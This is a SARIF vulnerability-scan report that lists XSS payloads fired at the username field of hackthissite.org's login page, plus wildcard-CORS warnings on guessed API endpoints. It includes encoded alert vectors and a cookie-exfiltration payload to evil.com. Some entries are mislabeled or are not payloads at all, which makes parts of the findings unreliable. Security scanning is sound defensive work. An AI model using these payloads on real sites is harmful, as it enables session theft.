{
  "version": "2.1.0",
  "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json",
  "runs": [
    {
      "tool": {
        "driver": {
          "name": "HSR Advanced",
          "version": "4.0",
          "informationUri": "https://github.com/hsr/hsr-advanced",
          "rules": [
            {
              "id": "HSR-XSS",
              "name": "XSS Vulnerability",
              "shortDescription": {
                "text": "Encode all user-supplied output using context-aware encoding (HTML, JS, URL). Im"
              },
              "fullDescription": {
                "text": "Encode all user-supplied output using context-aware encoding (HTML, JS, URL). Implement a strict Content-Security-Policy header. Use HTTPOnly and Secure flags on cookies. Reference: OWASP XSS Prevention Cheat Sheet."
              },
              "helpUri": "https://owasp.org/www-community/attacks/xss",
              "properties": {
                "tags": [
                  "security",
                  "xss"
                ],
                "cvss": 6.0
              }
            },
            {
              "id": "HSR-API",
              "name": "API Vulnerability",
              "shortDescription": {
                "text": "Implement proper authentication (OAuth 2.0 / API keys). Add rate limiting. Valid"
              },
              "fullDescription": {
                "text": "Implement proper authentication (OAuth 2.0 / API keys). Add rate limiting. Validate all inputs. Use security headers (CORS, CSP). Reference: OWASP API Security Top 10."
              },
              "helpUri": "https://owasp.org/www-community/attacks/api",
              "properties": {
                "tags": [
                  "security",
                  "api"
                ],
                "cvss": 6.4
              }
            }
          ]
        }
      },
      "results": [
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: %253Cmath%2520href%253Djavascript%253Aalert%25281%2529%253Eclick%253C/math%253E"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: <math href=javascript:alert(1)>click</math>%00"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: <math/**/href=javascript:alert(1)>click</math>"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: <math href=javascript:alert(1)>click</math>"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: \"><script>alert(1)</script>%00"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: &#34;&#62;&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: \"><script>alert(1)</script>"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: IithbGVydCgxKSsi"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: \"+alert(1)+\""
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: %22%2b%61%6c%65%72%74%28%31%29%2b%22"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: &#60;&#105;&#110;&#112;&#117;&#116;&#32;&#97;&#117;&#116;&#111;&#102;&#111;&#99;"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: <input autofocus onfocus=alert(1)> AND SLEEP(5)--"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: <input autofocus onfocus=alert(1)>"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: %253Cinput%2520autofocus%2520onfocus%253Dalert%25281%2529%253E"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: %3Cscript%3Efetch%28%27//evil.com%3Fc%3D%27%2Bdocument.cookie%29%3C/script%3E"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: \\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\\u0066\\u0065\\u0074\\u0063\\u0068\\u"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: <script>fetch('//evil.com?c='+document.cookie)</script>"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: %27%3b%61%6c%65%72%74%28%31%29%3b%2f%2f"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: ';alert(1);//%00"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: ';alert(1);//"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: %6a%61%76%61%73%63%72%69%70%74%3a%61%6c%65%72%74%28%31%29"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: javascript%3Aalert%281%29"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: javascript:alert(1)"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: %3c%73%76%67%2f%6f%6e%6c%6f%61%64%3d%61%6c%65%72%74%28%31%29%3e"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: <svg/onload=alert(1)>"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: &#60;&#115;&#118;&#103;&#47;&#111;&#110;&#108;&#111;&#97;&#100;&#61;&#97;&#108;&"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: 1. username='admin'; login_attempt='<script>alert('Login Failed')</script>'"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-XSS",
          "level": "error",
          "message": {
            "text": "Script tag injected, JavaScript protocol handler | Parameter: username | Payload: 2. username='secureuser'; password='password';"
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "High",
            "cvss": 6.0,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/openapi.json"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/graphql"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/api/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/v1"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/api"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/api/v3"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/api/auth"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/v2"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/token"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/user"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/graphiql"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/swagger-ui"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/api/v2"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/login"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        },
        {
          "ruleId": "HSR-API",
          "level": "warning",
          "message": {
            "text": "Wildcard CORS (Access-Control-Allow-Origin: *) | Parameter: endpoint | Payload: "
          },
          "locations": [
            {
              "physicalLocation": {
                "artifactLocation": {
                  "uri": "https://www.hackthissite.org/users"
                }
              }
            }
          ],
          "properties": {
            "severity": "Medium",
            "cvss": 6.4,
            "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
          }
        }
      ]
    }
  ]
}